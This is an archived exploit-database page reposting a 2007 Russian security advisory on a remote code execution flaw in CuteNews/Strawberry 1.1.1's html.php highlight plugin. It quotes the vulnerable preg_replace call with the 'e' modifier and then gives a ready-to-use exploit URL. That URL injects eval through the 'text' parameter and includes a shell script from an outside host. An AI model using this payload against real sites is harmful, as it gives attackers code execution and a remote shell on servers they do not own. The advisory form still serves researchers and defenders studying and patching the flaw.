首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability


http://www.gipsky.com/
----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]

Strawberry (CuteNews) Remote Code Execution
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .

Preg_replace with 'e' modifier allows code execution
<?php

$source = htmlspecialchars($text);

$source = preg_replace(
'/&lt;!--(.*?)--&gt;/es',
'"<span style=\"color: ".$options["color"]["comment"].";\">&lt;!--".
str_replace("&lt;","&lt;
str_replace("=","=
"$1")).
"--&gt;</span>"',
$source);

?>

strawberry/plugins/wacko/highlight/html.php?text=<!--{${eval($s)}}-->&s=include('blackybr.nm.ru/shell');


----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

[2008-01-06]
<< Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability NetRisk 1.9.7 (XSS/SQL) Multiple Remote Vulnerabilities >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8